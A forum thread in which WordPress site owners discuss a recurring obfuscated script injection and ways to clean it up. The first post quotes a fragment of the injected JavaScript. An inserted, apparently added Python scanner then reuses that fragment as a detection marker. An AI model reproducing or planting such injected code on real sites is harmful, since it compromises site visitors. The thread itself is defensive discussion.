This site may harm your computer.

angelo

New member
Jan 5, 2007
Script Injected to my Site

The script starts with this

<script>if(window.document)a=("v532b5".split+Date).substr(0,6);aa=([].reverse+[].reverse).substr(0,6);if(aa===a)


I opened up FileZilla, downloaded all the files that have been recently updated and found those lines of code. I deleted them and thought that would make it go away. I'll just wait for Google to crawl my site again and hopefully the warning message in Google would be removed.


but!!!!

Today I found out that the lines of code are back again! How can I protect my WordPress site from this?

I changed the passwords and deleted those lines again, but will this solve the problem?
 


Mother fuckers.. I also have a few sites with redirect scripts injected to my htaccess file...
Plan to tackle them this weekend.
 
I actually deleted those lines of code like 5 hours ago and now they're back.
@blogspotter what plugins do you have installed?

I have category post, statcounter, allinoneseopack installed.

I've read that plugins can also cause this. If we have a plugin in common then we can uninstall them.
 
The usual. allinoneseo, tweememe, facebook plugin with that stats, some back up plugin, autolinks, yaarp.. But I don't think it's the plugins.. It's not on all the sites, and I basically use the same plugin list.. Have to check...

Which file did you delete the line of code from?
Have you checked your .htaccess file?
Have you also checked the permissions for the folder?

And change all passwords.. FTP, database, Wp Admin..

Also I only use plugins that are already popular
 
I dealt with this a few months back. I actually couldn't get the problem completely removed, just re-installed WP.

But yes, change the passwords man, as blogspotter suggested, and also use SFTP to connect to your server if you can in future.

If they are injecting it, then you more than likely either have

a. compromised passwords giving them access to the server.
b. compromised server giving them access to anyone on the server.
 
Update WP. Also ensure you are not giving access to the .htaccess and other folders. Just right-click on the file and ensure it's not chmod to 777. If it is, change it to at least 775.

Cleaning out user accounts is always a good idea as well.
 
Force upgrade WP. Change passwords to your account/server. Check server for extra added files (remote exploit), check DB for added tables or modified users table.

Or, just back up your posts, and reinstall the entire thing, including creating a new username/password for everything.
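
The file checks suggested in this thread (find files carrying the injected script, files changed recently, and files left world-writable such as 777) can be scripted. The following is an added example, not part of the original thread or any poster's code; the marker is the fragment quoted in the first post, and the sample tree and its paths are constructed for the demonstration.

```python
import os
import stat
import tempfile
import time

# Fragment of the injected script quoted in the first post, used as a byte marker.
MARKER = b'("v532b5".split+Date)'

def audit_tree(root, since_hours=24, marker=MARKER):
    """Return {relative_path: [reasons]} for files that deserve a manual look."""
    cutoff = time.time() - since_hours * 3600
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, sockets, devices
            reasons = []
            with open(path, "rb") as fh:
                if marker in fh.read():
                    reasons.append("marker")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")  # e.g. 777 or 666
            if st.st_mtime >= cutoff:
                reasons.append("recent")
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

def build_sample(root):
    """Constructed sample tree (hypothetical paths, not taken from the thread)."""
    month_ago = time.time() - 30 * 86400
    injected = b"<script>if(window.document)a=" + MARKER + b".substr(0,6);"
    samples = {
        "index.php": (b"<?php // clean file\n", 0o644, month_ago),
        ".htaccess": (b"# constructed sample\n", 0o777, month_ago),
        "wp-content/themes/demo/footer.php": (injected, 0o644, None),
    }
    for rel, (data, mode, mtime) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, mode)
        if mtime is not None:
            os.utime(path, (mtime, mtime))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo_root:
        build_sample(demo_root)
        for rel, reasons in sorted(audit_tree(demo_root).items()):
            print(f"{rel}: {', '.join(reasons)}")
```

A marker match only catches this one variant of the script, and modification times can be reset by whoever wrote the file, so a clean result here does not clear a site on its own.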
 
You have any backup? If yes, delete the site and start over again.

This is what I had to do on one of my sites.

It sucks, but sometimes it's the only way. Plus, my technical knowledge on these kinds of things is extremely limited.

As far as the 'This Site May Harm Your Computer' warning in Google, I believe you can clear this using the webmaster tools. After I cleaned one of my sites, the message disappeared from Google in less than 24 hours. But, the damage was done and my traffic just hasn't been the same since. :(
 
A reminder to anyone using WordPress or any other CMS to back up on a regular basis.

I've been putting backing up my sites on the back burner for months now but I'm doing it now.